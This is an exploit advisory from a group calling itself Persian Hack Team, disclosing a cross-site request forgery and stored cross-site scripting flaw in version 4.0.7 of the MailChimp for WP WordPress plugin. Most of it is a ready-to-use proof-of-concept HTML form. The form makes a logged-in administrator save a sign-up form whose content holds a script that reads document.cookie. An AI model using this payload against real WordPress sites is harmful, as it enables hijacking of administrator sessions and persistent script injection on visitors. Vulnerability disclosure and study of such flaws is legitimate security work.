###################### # Exploit Title : WordPress Plugin MailChimp 4.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : https://wordpress.org/plugins/mailchimp-for-wp/ # Category: [ Webapps ] # Tested on: [ Win ] # Version: 4.0.7 # Date: 2016/11/19 ###################### # # PoC: # I would like to disclose CSRF and stored XSS vulnerability in Wordpress plugin MailChimp 4.0.7. # Demo Construction : http://persian-team.ir/showthread.php?tid=192 # The Code for CSRF.html is : <form action="http://localhost/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&view=edit-form&form_id=60" method="POST"> Title:<input type="text" name="mc4wp_form[name]" size="30" value="For Testing" id="title" spellcheck="true" autocomplete="off" placeholder="Enter the title of your sign-up form" style="line-height: initial;" > <input type="submit" style="display: none; " /> <input type="hidden" name="_mc4wp_action" value="edit_form" /> <input type="hidden" name="mc4wp_form_id" value="60" /> <input type="hidden" id="_mc4wp_nonce" name="_mc4wp_nonce" value="ad1a3e81af" /> <input type="hidden" name="_wp_http_referer" value="/wp/wp-admin/admin.php?page=mailchimp-for-wp-forms&amp;view=edit-form&amp;form_id=60" /> <h2>Form Fields</h2> <textarea class="widefat" cols="160" rows="20" id="mc4wp-form-content" name="mc4wp_form[content]" placeholder="Enter the HTML code for your form fields.." autocomplete="false" autocorrect="false" autocapitalize="false" spellcheck="false"> <script>alert(document.cookie)</script><p> </textarea> <input type="hidden" id="required-fields" name="mc4wp_form[settings][required_fields]" value="" /> <input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes" /></p> </form> # ###################### # Discovered by : Mojtaba MobhaM # Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : http://persian-team.ir ######################